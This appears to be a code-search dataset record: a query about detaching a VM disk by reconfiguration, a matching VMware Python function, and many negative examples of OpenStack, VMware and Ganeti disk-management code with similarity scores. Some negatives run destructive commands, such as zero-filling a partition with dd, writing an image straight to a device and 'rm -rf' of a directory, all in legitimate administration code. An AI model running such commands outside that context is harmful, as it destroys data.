different mode\")\n raise exception.InvalidVolume(reason=msg)\n elif volume['status'] != \"available\":\n msg = _(\"status must be available\")\n raise exception.InvalidVolume(reason=msg)\n # TODO(jdg): attach_time column is currently varchar\n # we should update this to a date-time object\n # also consider adding detach_time?\n self.db.volume_update(context, volume_id,\n {\"instance_uuid\": instance_uuid,\n \"mountpoint\": mountpoint,\n \"attached_host\": host_name\n })\n\n self.db.volume_admin_metadata_update(context.elevated(),\n volume_id,\n {\"attached_mode\": mode},\n False)\n return do_attach()", "def add_disks(self, num_disks, vm, size, disk_type='thin'):\n for _ in range(int(num_disks)):\n self.add_disk(vm, size, disk_type)", "def mount(self, dev, path, mount_options):\n # if directory is not a mount point, mount it\n if not os.path.ismount(path):\n # check to see if dev is LVM. If so, activate it's associated volume group\n vg = self.get_vg(dev)\n if len(vg) > 0:\n Helper._runOsCommand(\"sudo /sbin/pvscan && sudo /sbin/vgscan && sudo /sbin/lvscan && sudo /sbin/vgchange -ay %s\" % vg, self.tracer)\n # check / create mount point and mount device\n self._checkAndCreatePath(path)\n self._mount(dev, path, mount_options)\n else:\n self.tracer.info(\"device %s is already mounted to %s\" % (dev, path))", "def migration(self):\n nova_connection_destination = self.destination_connection.get_nova_connection(self.destination_region_name)\n cinder_connection_destination = self.destination_connection.get_cinder_connection(self.destination_region_name)\n self._make_migration()\n try:\n status = nova_connection_destination.connection.servers.get(self.resource_manager.instance_resource.resource_created['id']).to_dict()['status']\n except Exception:\n print(\"Can't found the instance\")\n return\n # TODO make the status in the right way\n while status != 'ACTIVE':\n status = nova_connection_destination.connection.servers.get(self.resource_manager.instance_resource.resource_created['id']).to_dict()['status']\n if status != 'ACTIVE' and status != 'BUILD':\n print(\"Can't launch the instance\")\n raise ValueError(\"Status is not ACTIVE or BUILD: Status = [{}]\".format(status))\n print(\"Instance launch\")\n\n disk_device_attached = False\n # TODO attach the disk in an other function\n while not disk_device_attached:\n disk_device_attached = True\n for storage_resource in self.resource_manager.storage_resource:\n if storage_resource.resource_created == {}:\n print(\"Can't attach the resource {}\".format(storage_resource))\n continue\n try:\n disk_information = cinder_connection_destination.connection.volumes.get(storage_resource.resource_created['id']).to_dict()\n except Exception as exception:\n print(\"Can't get the resource {}\".format(storage_resource))\n continue\n # TODO make an enum for disk_information\n if disk_information['status'] == 'available':\n attach_a_volume(nova_connection_destination, self.resource_manager.instance_resource.resource_created['id'], disk_information['id'])\n print(\"Disk {} attach to instance\".format(disk_information['id']))\n elif disk_information['status'] == 'error' or disk_information['status'] == 'error_deleting' or disk_information['status'] == 'error_backing-up' or disk_information['status'] == 'error_restoring' or disk_information['status'] == 'error_extending':\n print(\"Status error {} for the disk {}\".format(status, disk_information['id']))\n print(\"Disk information {}\".format(disk_information))\n continue\n elif disk_information['status'] != 'in-use':\n disk_device_attached = False\n\n information = nova_connection_destination.connection.servers.get(self.resource_manager.instance_resource.resource_created['id']).to_dict()\n print(\"Addresses\")\n print(json.dumps(information['addresses'], indent=4))", "def connect_instance_disk_to_mgmt(self, instance):\n for stg_elem, vios in self._get_bootdisk_iter(instance):\n msg_args = {'disk_name': stg_elem.name, 'vios_name': vios.name}\n\n # Create a new mapping. NOTE: If there's an existing mapping on\n # the other VIOS but not this one, we'll create a second mapping\n # here. It would take an extreme sequence of events to get to that\n # point, and the second mapping would be harmless anyway. The\n # alternative would be always checking all VIOSes for existing\n # mappings, which increases the response time of the common case by\n # an entire GET of VIOS+VIO_SMAP.\n LOG.debug(\"Mapping boot disk %(disk_name)s to the management \"\n \"partition from Virtual I/O Server %(vios_name)s.\",\n msg_args, instance=instance)\n try:\n tsk_map.add_vscsi_mapping(self.host_uuid, vios, self.mp_uuid,\n stg_elem)\n # If that worked, we're done. add_vscsi_mapping logged.\n return stg_elem, vios\n except Exception:\n LOG.exception(\"Failed to map boot disk %(disk_name)s to the \"\n \"management partition from Virtual I/O Server \"\n \"%(vios_name)s.\", msg_args, instance=instance)\n # Try the next hit, if available.\n # We either didn't find the boot dev, or failed all attempts to map it.\n raise npvmex.InstanceDiskMappingFailed(instance_name=instance.name)", "def create_snapshot_helper(\n vm,\n target_version=None,\n drives=None,\n balloon=False,\n diff_snapshots=False,\n):\n if diff_snapshots is False:\n snapshot_type = SnapshotType.FULL\n else:\n # Version 0.24 and greater has Diff and balloon support.\n snapshot_type = SnapshotType.DIFF\n\n if balloon:\n # Add a memory balloon with stats enabled.\n vm.api.balloon.put(\n amount_mib=0, deflate_on_oom=True, stats_polling_interval_s=1\n )\n\n test_drives = [] if drives is None else drives\n\n # Add disks.\n for scratch in test_drives:\n # Add a scratch 64MB RW non-root block device.\n scratchdisk = drive_tools.FilesystemFile(tempfile.mktemp(), size=64)\n vm.add_drive(scratch, scratchdisk.path)\n\n # Workaround FilesystemFile destructor removal of file.\n scratchdisk.path = None\n\n for _ in range(4):\n vm.add_net_iface()\n\n vm.start()\n\n # Iterate and validate connectivity on all ifaces after boot.\n for i in range(4):\n exit_code, _, _ = vm.ssh_iface(i).run(\"sync\")\n assert exit_code == 0\n\n # Mount scratch drives in guest.\n for blk in test_drives:\n # Create mount point and mount each device.\n cmd = f\"mkdir -p /tmp/mnt/{blk} && mount /dev/{blk} /tmp/mnt/{blk}\"\n exit_code, _, _ = vm.ssh.run(cmd)\n assert exit_code == 0\n\n # Create file using dd using O_DIRECT.\n # After resume we will compute md5sum on these files.\n dd = f\"dd if=/dev/zero of=/tmp/mnt/{blk}/test bs=4096 count=10 oflag=direct\"\n exit_code, _, _ = vm.ssh.run(dd)\n assert exit_code == 0\n\n # Unmount the device.\n cmd = f\"umount /dev/{blk}\"\n exit_code, _, _ = vm.ssh.run(cmd)\n assert exit_code == 0\n\n snapshot = vm.make_snapshot(snapshot_type, target_version=target_version)\n print(\"========== Firecracker create snapshot log ==========\")\n print(vm.log_data)\n vm.kill()\n return snapshot", "def flash_image(disk_image, device):\n cmd = 'dd if={disk_image} | pv | sudo dd of={device_path}'\n\n populated_cmd = cmd.format(\n disk_image=disk_image,\n device_path=device.path)\n\n # why check output? because then you can do the cool\n # dd | pv | dd trick. '|pv|'' is awesome stdout.\n output = check_output(populated_cmd, shell=True)\n print(output)", "def test_disk(self):\n self.command.package = self.input_ovf\n self.command.file_id = \"file1\"\n self.command.run()\n self.command.finished()\n self.check_diff(\"\"\"\n <ovf:References>\n- <ovf:File ovf:href=\"input.vmdk\" ovf:id=\"file1\" ovf:size=\"{vmdk_size}\" />\n <ovf:File ovf:href=\"input.iso\" ovf:id=\"file2\" ovf:size=\"{iso_size}\" />\n...\n <ovf:Info>Virtual disk information</ovf:Info>\n- <ovf:Disk ovf:capacity=\"1\" ovf:capacityAllocationUnits=\"byte * 2^30\" \\\novf:diskId=\"vmdisk1\" ovf:fileRef=\"file1\" ovf:format=\"http://www.vmware.com/\\\ninterfaces/specifications/vmdk.html#streamOptimized\" />\n </ovf:DiskSection>\n...\n <rasd:AddressOnParent>0</rasd:AddressOnParent>\n- <rasd:ElementName>Hard Drive</rasd:ElementName>\n- <rasd:HostResource>ovf:/disk/vmdisk1</rasd:HostResource>\n- <rasd:InstanceID>6</rasd:InstanceID>\n- <rasd:Parent>3</rasd:Parent>\n- <rasd:ResourceType>17</rasd:ResourceType>\n- </ovf:Item>\n- <ovf:Item>\n- <rasd:AddressOnParent>0</rasd:AddressOnParent>\n <rasd:AutomaticAllocation>true</rasd:AutomaticAllocation>\n\"\"\".format(vmdk_size=self.FILE_SIZE['input.vmdk'],\n iso_size=self.FILE_SIZE['input.iso']))\n self.assertFalse(os.path.exists(os.path.join(self.temp_dir,\n \"input.vmdk\")),\n \"deleted file should not be exported\")", "def reboot_guest(self, vm):\n try:\n self.client.reboot_guest(vm.backend_id)\n except VMwareError as e:\n raise VMwareBackendError(e)", "def pxe_netboot(self, filename):\n new_port = {\n 'extra_dhcp_opts': [\n {'opt_name': 'bootfile-name', 'opt_value': 'http://192.0.2.240:8088/' + filename, 'ip_version': 4, },\n {'opt_name': 'tftp-server', 'opt_value': '192.0.2.240', 'ip_version': '4'},\n {'opt_name': 'server-ip-address', 'opt_value': '192.0.2.240', 'ip_version': '4'}\n ]\n }\n self.neutron.update_port(self._provision_port_id, {'port': new_port})", "def attach(self):\n args = {\n 'detach': True,\n 'tty': True,\n }\n if self._args.command:\n args['command'] = self._args.command\n\n try:\n try:\n ident = self.client.images.pull(self._args.image)\n img = self.client.images.get(ident)\n except podman.ImageNotFound as e:\n sys.stdout.flush()\n print(\n 'Image {} not found.'.format(e.name),\n file=sys.stderr,\n flush=True)\n return 1\n\n ctnr = img.create(**args)\n ctnr.attach(eot=4)\n\n try:\n ctnr.start()\n print()\n except (BrokenPipeError, KeyboardInterrupt):\n print('\\nContainer disconnected.')\n except podman.ErrorOccurred as e:\n sys.stdout.flush()\n print(\n '{}'.format(e.reason).capitalize(),\n file=sys.stderr,\n flush=True)\n return 1", "def _attach_volume_to_sg(self, context, volume_id, sg_client):\n @utils.synchronized(sg_client.instance)\n def _do_attach_volume(context, volume_id, sg_client):\n try:\n old_devices = self.driver.list_devices(sg_client)\n LOG.info(_LI(\"old devices: %s\"), old_devices)\n nova_client = self._create_nova_client(self.admin_context)\n nova_client.volumes.create_server_volume(sg_client.instance,\n volume_id)\n cinder_client = self._create_cinder_client(context)\n cinder_volume = self._wait_cinder_volume_status(\n cinder_client, volume_id, 'in-use')\n if cinder_volume.status != 'in-use':\n raise Exception(_LE(\"attach volume to sg failed\"))\n new_devices = self.driver.list_devices(sg_client)\n LOG.info(_LI(\"new devices: %s\"), new_devices)\n added_devices = [device for device in new_devices\n if device not in old_devices]\n return added_devices[0]\n except Exception as err:\n LOG.error(err)\n raise exception.AttachSGFailed(reason=err)\n\n return _do_attach_volume(context, volume_id, sg_client)", "def disk():\n run(env.disk_usage_command % env)", "def set_disk_type(self, nDiskType):\n\t\tcall_sdk_function('PrlVmDevHd_SetDiskType', self.handle, nDiskType)", "def capture(self, instance_id, name, additional_disks=False, notes=None):\r\n vsi = self.get_instance(instance_id)\r\n\r\n disk_filter = lambda x: x['device'] == '0'\r\n # Disk 1 is swap partition. Need to skip its capture.\r\n if additional_disks:\r\n disk_filter = lambda x: x['device'] != '1'\r\n\r\n disks = [block_device for block_device in vsi['blockDevices']\r\n if disk_filter(block_device)]\r\n\r\n return self.guest.createArchiveTransaction(\r\n name, disks, notes, id=instance_id)", "def setDiskId(self, diskId):\n self.__diskId = diskId", "def _CheckAttachDisk(self, params):\n uuid = params.get(\"uuid\", None)\n name = params.get(constants.IDISK_NAME, None)\n\n disk = self.GenericGetDiskInfo(uuid, name)\n instance_template = self.cfg.GetInstanceDiskTemplate(self.instance.uuid)\n if (disk.dev_type != instance_template and\n instance_template != constants.DT_DISKLESS):\n raise errors.OpPrereqError(\"Instance has '%s' template while disk has\"\n \" '%s' template\" %\n (instance_template, disk.dev_type),\n errors.ECODE_INVAL)\n\n instance_nodes = self.cfg.GetInstanceNodes(self.instance.uuid)\n # Make sure we do not attach disks to instances on wrong nodes. If the\n # instance is diskless, that instance is associated only to the primary\n # node, whereas the disk can be associated to two nodes in the case of DRBD,\n # hence, we have a subset check here.\n if disk.nodes and not set(instance_nodes).issubset(set(disk.nodes)):\n raise errors.OpPrereqError(\"Disk nodes are %s while the instance's nodes\"\n \" are %s\" %\n (disk.nodes, instance_nodes),\n errors.ECODE_INVAL)\n # Make sure a DRBD disk has the same primary node as the instance where it\n # will be attached to.\n disk_primary = disk.GetPrimaryNode(self.instance.primary_node)\n if self.instance.primary_node != disk_primary:\n raise errors.OpExecError(\"The disks' primary node is %s whereas the \"\n \"instance's primary node is %s.\"\n % (disk_primary, self.instance.primary_node))", "def _CreateNewDisk(self, idx, params, _):\n # add a new disk\n disk_template = self.cfg.GetInstanceDiskTemplate(self.instance.uuid)\n disk = self._GenerateDiskTemplateWrapper(idx, disk_template,\n params)\n new_disks = CreateDisks(self, self.instance, disks=[disk])\n self.cfg.AddInstanceDisk(self.instance.uuid, disk, idx)\n\n # re-read the instance from the configuration\n self.instance = self.cfg.GetInstanceInfo(self.instance.uuid)\n\n if self.cluster.prealloc_wipe_disks:\n # Wipe new disk\n WipeOrCleanupDisks(self, self.instance,\n disks=[(idx, disk, 0)],\n cleanup=new_disks)\n\n changes = [\n (\"disk/%d\" % idx,\n \"add:size=%s,mode=%s\" % (disk.size, disk.mode)),\n ]\n if self.op.hotplug:\n result = self.rpc.call_blockdev_assemble(self.instance.primary_node,\n (disk, self.instance),\n self.instance, True, idx)\n if result.fail_msg:\n changes.append((\"disk/%d\" % idx, \"assemble:failed\"))\n self.LogWarning(\"Can't assemble newly created disk %d: %s\",\n idx, result.fail_msg)\n else:\n _, link_name, uri = result.payload\n msg = self._HotplugDevice(constants.HOTPLUG_ACTION_ADD,\n constants.HOTPLUG_TARGET_DISK,\n disk, (link_name, uri), idx)\n changes.append((\"disk/%d\" % idx, msg))\n\n return (disk, changes)" ]
[ "0.73531574", "0.68157685", "0.67563796", "0.66293067", "0.64325035", "0.6426697", "0.63882655", "0.6334873", "0.623497", "0.6223832", "0.62092334", "0.6202001", "0.6195019", "0.61449945", "0.6086266", "0.6073298", "0.6072383", "0.6067116", "0.6057906", "0.59617317", "0.58979154", "0.5896533", "0.5861778", "0.58505684", "0.58503675", "0.5837277", "0.58187383", "0.5788604", "0.5738113", "0.57315546", "0.5718782", "0.57136226", "0.56757367", "0.56208855", "0.5575326", "0.55664396", "0.5561868", "0.5550153", "0.55482286", "0.55343986", "0.5527139", "0.5524799", "0.5520515", "0.5484066", "0.5460997", "0.545557", "0.54523647", "0.54431415", "0.5441539", "0.5435524", "0.5435524", "0.5420449", "0.5363872", "0.53360766", "0.5316801", "0.5314659", "0.53122187", "0.5296047", "0.5273458", "0.5268158", "0.52607614", "0.52459884", "0.5244801", "0.5231324", "0.52298087", "0.52244496", "0.5220446", "0.52197963", "0.5213205", "0.521184", "0.5210166", "0.51888794", "0.5184167", "0.51840895", "0.5174495", "0.5153865", "0.5143351", "0.5139335", "0.5135656", "0.51296425", "0.5124402", "0.51168525", "0.51145244", "0.5098203", "0.5091405", "0.5080465", "0.5073299", "0.50715923", "0.50712025", "0.5069662", "0.5069586", "0.5064434", "0.50430274", "0.50406736", "0.5033876", "0.5014945", "0.50132006", "0.5008476", "0.49871492", "0.49857247" ]
0.7390084
0
Detach disk from VM by reconfiguration.
def detach_disk_from_vm(self, vm_ref, instance_name, device): client_factory = self._session._get_vim().client.factory vmdk_detach_config_spec = vm_util.get_vmdk_detach_config_spec( client_factory, device) disk_key = device.key LOG.debug(_("Reconfiguring VM instance %(instance_name)s to detach " "disk %(disk_key)s") % locals()) reconfig_task = self._session._call_method( self._session._get_vim(), "ReconfigVM_Task", vm_ref, spec=vmdk_detach_config_spec) self._session._wait_for_task(instance_name, reconfig_task) LOG.debug(_("Reconfigured VM instance %(instance_name)s to detach " "disk %(disk_key)s") % locals())
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def disk_detach(vmdk_path, vm):\n\n device = findDeviceByPath(vmdk_path, vm)\n\n if not device:\n # Could happen if the disk attached to a different VM - attach fails\n # and docker will insist to sending \"unmount/detach\" which also fails.\n msg = \"*** Detach failed: disk={0} not found. VM={1}\".format(\n vmdk_path, vm.config.uuid)\n logging.warning(msg)\n return err(msg)\n\n spec = vim.vm.ConfigSpec()\n dev_changes = []\n\n disk_spec = vim.vm.device.VirtualDeviceSpec()\n disk_spec.operation = vim.vm.device.VirtualDeviceSpec.Operation.remove\n disk_spec.device = device\n dev_changes.append(disk_spec)\n spec.deviceChange = dev_changes\n\n try:\n wait_for_tasks(si, [vm.ReconfigVM_Task(spec=spec)])\n except vim.fault.GenericVmConfigFault as ex:\n for f in ex.faultMessage:\n logging.warning(f.message)\n return err(\"Failed to detach \" + vmdk_path)\n\n setStatusDetached(vmdk_path)\n logging.info(\"Disk detached %s\", vmdk_path)\n return None", "def detachDiskFromMinipad(self , disk):\n return", "def _DetachDisk(self, idx, root, _):\n hotmsg = \"\"\n if self.op.hotplug:\n hotmsg = self._HotplugDevice(constants.HOTPLUG_ACTION_REMOVE,\n constants.HOTPLUG_TARGET_DISK,\n root, None, idx)\n\n # Always shutdown the disk before detaching.\n ShutdownInstanceDisks(self, self.instance, [root])\n\n # Rename detached disk.\n #\n # Transform logical_id from:\n # <file_storage_dir>/<instance_name>/<disk_name>\n # to\n # <file_storage_dir>/<disk_name>\n if root.dev_type in (constants.DT_FILE, constants.DT_SHARED_FILE):\n file_driver = root.logical_id[0]\n instance_path, disk_name = os.path.split(root.logical_id[1])\n new_path = os.path.join(os.path.dirname(instance_path), disk_name)\n new_logical_id = (file_driver, new_path)\n result = self.rpc.call_blockdev_rename(self.instance.primary_node,\n [(root, new_logical_id)])\n result.Raise(\"Failed before detach\")\n # Update logical_id\n self.cfg.SetDiskLogicalID(root.uuid, new_logical_id)\n\n # Remove disk from config\n self.cfg.DetachInstanceDisk(self.instance.uuid, root.uuid)\n\n # re-read the instance from the configuration\n self.instance = self.cfg.GetInstanceInfo(self.instance.uuid)\n\n return hotmsg", "def detachDisk(positive, alias, vmName):\n logger.info(\"Detaching disk %s from vm %s\", alias, vmName)\n disk_attachment = get_disk_attachment(vmName, alias, attr='name')\n return DISK_ATTACHMENTS_API.delete(disk_attachment, positive)", "def detach_volume(self, host_path: str):\n del self.volumes[host_path]", "def detach_volume(self, connection_info, instance, mountpoint,\n encryption=None):", "def detach_pd(self, conn, host, pd):\n zone = self.get_zone(conn, host)\n pdhost = self.get_pd_host(conn, pd, zone)\n if pdhost == \"\":\n self.tracer.info(\n \"disk %s is already attached to %s(%s)\" % (pd, host, zone))\n elif pdhost == host:\n self.tracer.info(\"attempting to detach %s from %s(%s)\" % (pd, host, zone))\n operation = conn.instances().detachDisk(project=PROJECT, zone=zone, instance=host, deviceName=pd).execute()\n self.wait_for_operation(conn, operation, zone)\n if self.get_pd_host(conn, pd, zone) == \"\":\n self.tracer.info(\"successfully detached %s from %s(%s)\" % (pd, host, zone))", "def disconnect_disk_from_mgmt(self, vios_uuid, disk_name):\n raise NotImplementedError()", "def disconnect_disk(self, instance, stg_ftsk=None, disk_type=None):\n raise NotImplementedError()", "def detach(self):\r\n\r\n return self.driver.detach_volume(volume=self)", "def detach_volume(self, connection_info, instance, mountpoint,\n encryption=None):\n vhd_name = connection_info['data']['disk_name']\n vm = self._get_instance(instance.uuid)\n data_disks = vm.storage_profile.data_disks\n not_found = True\n for i in range(len(data_disks)):\n if vhd_name == data_disks[i].name:\n del data_disks[i]\n not_found = False\n break\n if not_found:\n LOG.info(_LI('Volume: %s was not attached to Instance!'),\n vhd_name, instance=instance)\n return\n self._create_update_instance(instance, vm)\n LOG.info(_LI(\"Detach Volume to Instance in Azure finish\"),\n instance=instance)", "def detach(self, name):\n volume_info = self.cm.find_name(name)\n if volume_info and volume_info[0]['State'] != \"deleted\":\n vms = volume_info[0]['AttachedToVm']\n path = volume_info[0]['path']\n if len(vms) == 0:\n Console.error(f\"{name} is not attached to any vm\")\n else:\n removed = []\n for vm in vms:\n result = self.unmount(path=f\"{path}/{name}\", vm=vm)\n mounts = result['mounts']\n if f\"{path}/{name}\" not in mounts.keys():\n removed.append(vm)\n for vm in removed:\n vms.remove(vm)\n result = self.update_volume_after_detach(volume_info, vms)\n return result[0]\n else:\n Console.error(\"volume does not exist or volume had been deleted\")", "def detach(self):\n raise io.UnsupportedOperation", "def detach_volume(self, instance_name, mountpoint):\n return True", "def detach_volume(self, context, volume_id):\n # TODO(vish): refactor this into a more general \"unreserve\"\n # TODO(sleepsonthefloor): Is this 'elevated' appropriate?\n # self.db.volume_detached(context.elevated(), volume_id)\n self.db.volume_admin_metadata_delete(context.elevated(), volume_id,\n 'attached_mode')", "def detach_volume(self):\n\n # Choose the volume\n volume_id = self._choose_among_used_volumes()\n\n # Cancel\n if not volume_id:\n print 'Operation cancelled'\n return\n\n # Detach the volume\n print '# Detaching volume \"%s\"!' % volume_id\n if self.compute.detach_volume(volume_id):\n print 'The volume has been detached!'\n else:\n print 'The volume could not been detached'", "def delete(vmname, deldisk=True):\n\n dom = _conn.lookupByName(vmname)\n if dom.isActive():\n dom.destroy()\n infokeeper.update_status_vm(vmname, Instance.STATUS_POWER_OFF)\n dom.undefine()\n infokeeper.delete_vm(vmname)\n if deldisk:\n os.remove(os.path.join(base_disk_path, dom.name() + '.img'))\n return 'VM %s deleted' % vmname", "def detach(self, force=False):\r\n instance_id = None\r\n if self.attach_data:\r\n instance_id = self.attach_data.instance_id\r\n device = None\r\n if self.attach_data:\r\n device = self.attach_data.device\r\n return self.connection.detach_volume(self.id, instance_id, device, force)", "def detach(self, storages):\n self.tracer.info(\"%s.attach method called\" % self.__class__.__name__)\n\n # init variables & arrays\n all_pds = []\n all_vgs = []\n unmount_err = 0\n\n # reload global.ini\n self._cfg.reload()\n\n # connect to Google API\n conn = self.api_conn()\n\n # fetch the GCE zone for this host\n zone = self.get_zone(conn, HOSTNAME)\n\n for storage in storages:\n # fetch pd & dev variables for specified partition & usage\n connectionData = self._getConnectionDataForLun(storage.get(\"partition\"), storage.get(\"usage_type\"))\n try:\n pd = connectionData[\"pd\"]\n dev = connectionData[\"dev\"]\n except:\n raise Exception(\"pd or dev not set in global.ini\")\n\n # fetch the host which currently owns the disk & the file path\n path = storage.get(\"path\")\n\n # try to unmount the file system twice\n self._forcedUnmount(dev, path, 2)\n\n # if it's still mounted, try killing blocking processes and umount again\n if os.path.ismount(path):\n self._lsof_and_kill(path)\n self._forcedUnmount(dev, path, 2)\n\n # if still mounted, raise exception. The taking over node will stonith this host\n if os.path.ismount(path):\n self.tracer.warning(\"A PID belonging to someone other than SIDADM is blocking the unmount. This node will be fenced\")\n self._umount(path, lazy=True)\n mount_err = 1\n\n # add to list of devices.\n all_pds.append(pd)\n\n # check to see if the device is a VG. If so, add it to the list of VG's\n all_vgs.append(self.get_vg(dev))\n\n # Stop each unique VG\n all_vgs = list(set(all_vgs))\n for vg in all_vgs:\n Helper._runOsCommand(\"sudo /sbin/vgchange -an %s\" % vg, self.tracer)\n self.tracer.info(\"stopping volume group %s\" % (vg))\n\n # for each unique disk detected, detach it using Google API's\n all_pds = list(set(all_pds))\n for pd_member in all_pds:\n self.detach_pd(conn, HOSTNAME, pd_member)\n\n # if there was an error unmounting, self fence\n if unmount_err == 1:\n self.fence(conn, pdhost)\n\n # tell HANA we successfully detached\n return 0", "def delete_disk(self, disk, delete_vmdk=True):\n backend_disk = self.get_backend_disk(disk)\n\n try:\n self.client.delete_disk(disk.vm.backend_id, disk.backend_id)\n except VMwareError as e:\n raise VMwareBackendError(e)\n\n if delete_vmdk:\n vdm = self.soap_client.content.virtualDiskManager\n task = vdm.DeleteVirtualDisk(\n name=backend_disk.backing.fileName,\n datacenter=self.get_disk_datacenter(backend_disk),\n )\n try:\n pyVim.task.WaitForTask(task)\n except Exception:\n logger.exception('Unable to delete VMware disk. Disk ID: %s.', disk.id)\n raise VMwareBackendError('Unknown error.')\n signals.vm_updated.send(self.__class__, vm=disk.vm)", "def detach_volume(self, connection_info, instance, mountpoint):\n instance_name = instance['name']\n vm_ref = vm_util.get_vm_ref_from_name(self._session, instance_name)\n if vm_ref is None:\n raise exception.InstanceNotFound(instance_id=instance_name)\n # Detach Volume from VM\n LOG.debug(_(\"Detach_volume: %(instance_name)s, %(mountpoint)s\")\n % locals())\n driver_type = connection_info['driver_volume_type']\n if driver_type not in ['iscsi']:\n raise exception.VolumeDriverNotFound(driver_type=driver_type)\n data = connection_info['data']\n\n # Discover iSCSI Target\n device_name, uuid = volume_util.find_st(self._session, data,\n self._cluster)\n if device_name is None:\n raise volume_util.StorageError(_(\"Unable to find iSCSI Target\"))\n\n # Get the vmdk file name that the VM is pointing to\n hardware_devices = self._session._call_method(vim_util,\n \"get_dynamic_property\", vm_ref,\n \"VirtualMachine\", \"config.hardware.device\")\n device = vm_util.get_rdm_disk(hardware_devices, uuid)\n if device is None:\n raise volume_util.StorageError(_(\"Unable to find volume\"))\n self.detach_disk_from_vm(vm_ref, instance_name, device)\n LOG.info(_(\"Mountpoint %(mountpoint)s detached from \"\n \"instance %(instance_name)s\") % locals())", "def _detach_volume(self, server, volume):\n try:\n volume = self.volumes_client.show_volume(volume['id'])['volume']\n # Check the status. You can only detach an in-use volume, otherwise\n # the compute API will return a 400 response.\n if volume['status'] == 'in-use':\n self.servers_client.detach_volume(server['id'], volume['id'])\n except lib_exc.NotFound:\n # Ignore 404s on detach in case the server is deleted or the volume\n # is already detached.\n pass", "def _detach_volume(self, server, volume):\n try:\n volume = self.volumes_client.show_volume(volume['id'])['volume']\n # Check the status. You can only detach an in-use volume, otherwise\n # the compute API will return a 400 response.\n if volume['status'] == 'in-use':\n self.servers_client.detach_volume(server['id'], volume['id'])\n except lib_exc.NotFound:\n # Ignore 404s on detach in case the server is deleted or the volume\n # is already detached.\n pass", "def vm_diskdelete(args):\n name = args.name\n diskname = args.diskname\n pool = args.pool\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n if diskname is None:\n common.pprint(\"Missing diskname. Leaving...\", color='red')\n os._exit(1)\n common.pprint(\"Deleting disk %s\" % diskname)\n k.delete_disk(name=name, diskname=diskname, pool=pool)\n return", "async def eject(self) -> None:\n await self.dbus.Drive.call_eject(UDISKS2_DEFAULT_OPTIONS)", "def down():\n\n # Stop the program if no init has occurred.\n Vagrant.stop_if_not_init()\n\n # Run vagrant halt from the vagrant folder.\n command = [\"vagrant\", \"halt\"]\n cwd = Settings.devbox_folder\n try:\n result = subprocess.check_call(command, cwd=cwd)\n except subprocess.CalledProcessError:\n Utilities.log(\"Could not run 'vagrant halt'.\")\n exit(1)", "def detach(target, sysip):\n click.secho(\"Attempting to detach template.\")\n\n payload = {\n \"deviceType\":\"vedge\",\n \"devices\":[ \n {\n \"deviceId\":str(target),\n \"deviceIP\":str(sysip)\n }\n ]\n }\n\n url = base_url + \"/template/config/device/mode/cli\"\n\n response = requests.post(url=url, data=json.dumps(payload), headers=header, verify=False)\n if response.status_code == 200:\n id = response.json()[\"id\"]\n url = base_url + \"/device/action/status/\" + str(id)\n while(1):\n status_res = requests.get(url,headers=header,verify=False)\n if status_res.status_code == 200:\n push_status = status_res.json()\n if push_status['summary']['status'] == \"done\":\n if 'Success' in push_status['summary']['count']:\n print(\"Changed configuration mode to CLI\")\n elif 'Failure' in push_status['summary']['count']:\n print(\"Failed to change configuration mode to CLI\")\n exit()\n break\n else:\n print(\"Failed to detach template with error \" + response.text)\n exit()", "def detach_volume(self,\n connection_info,\n instance,\n mountpoint,\n encryption=None):\n volume_data = connection_info['data']\n azure_name = self._get_omni_name_from_instance(instance)\n azure_instance = utils.get_instance(\n self.compute_client, drv_conf.resource_group, azure_name)\n data_disks = azure_instance.storage_profile.data_disks\n name = volume_data['name']\n filtered_disks = [disk for disk in data_disks if disk.name != name]\n if len(filtered_disks) == len(data_disks):\n LOG.error(\"Volume %s was not attached to instance %s\" %\n (name, instance.uuid))\n return\n azure_instance.storage_profile.data_disks = filtered_disks\n utils.create_or_update_instance(self.compute_client,\n drv_conf.resource_group, azure_name,\n azure_instance)\n LOG.info(\"Detached volume %s from instance %s\" % (name, instance.uuid))", "def _wipe(self):\n log_method_call(self, self.name, status=self.status)\n\n start = self.partedPartition.geometry.start\n part_len = self.partedPartition.geometry.end - start\n bs = self.partedPartition.geometry.device.sectorSize\n device = self.partedPartition.geometry.device.path\n\n # Erase 1MiB or to end of partition\n count = int(Size(\"1 MiB\") / bs)\n count = min(count, part_len)\n\n cmd = [\"dd\", \"if=/dev/zero\", \"of=%s\" % device, \"bs=%s\" % bs,\n \"seek=%s\" % start, \"count=%s\" % count]\n try:\n util.run_program(cmd)\n except OSError as e:\n log.error(str(e))\n finally:\n # If a udev device is created with the watch option, then\n # a change uevent is synthesized and we need to wait for\n # things to settle.\n udev.settle()", "def _unprovision_node(self, conn):\n conn.run(f\"rm -rf {EXPORTER_HOME}\")", "def tear_down(duthost1, duthost2, ptfhost, localhost, collect):\n yield\n\n mclag_interfaces = collect[duthost1.hostname]['mclag_interfaces']\n cmds_to_del_lags = ['ip link del {}'.format(lag) for lag in mclag_interfaces]\n ptfhost.shell_cmds(cmds=cmds_to_del_lags)\n\n ptfhost.remove_ip_addresses()\n duthost1.shell(\"mv {} {}\".format(CONFIG_DB_BACKUP, CONFIG_DB_TEMP))\n reboot(duthost1, localhost)\n\n duthost2.shell(\"mv {} {}\".format(CONFIG_DB_BACKUP, CONFIG_DB_TEMP))\n reboot(duthost2, localhost)", "def peer_detach(self):\n cmd = \"gluster peer detach %s\"%(self.server)\n if self.force is True:\n cmd = cmd + ' force'\n cmdlist = shlex.split(cmd)\n output = subprocess.Popen(cmdlist, stdout = subprocess.PIPE,\n stderr = subprocess.PIPE)\n # TODO: Do more extensive error check\n stdout = output.stdout.read()\n stderr = output.stderr.read()\n print json.dumps({\n \"Server detached\": self.server,\n \"Status\": stdout\n })", "def detach(args, **_):\n\n volume_id = \\\n utils.get_external_resource_id_or_raise(\n 'detach volume', ctx.source.instance)\n instance_id = \\\n utils.get_external_resource_id_or_raise(\n 'detach volume', ctx.target.instance)\n\n if _detach_external_volume_or_instance():\n return\n\n ctx.logger.debug('Detaching EBS volume {0}'.format(volume_id))\n\n volume_object = _get_volumes_from_id(volume_id)\n\n if not volume_object:\n raise NonRecoverableError(\n 'EBS volume {0} not found in account.'.format(volume_id))\n\n try:\n detached = volume_object.detach(**args)\n except (boto.exception.EC2ResponseError,\n boto.exception.BotoServerError) as e:\n raise NonRecoverableError('{0}'.format(str(e)))\n\n if not detached:\n raise NonRecoverableError(\n 'Failed to 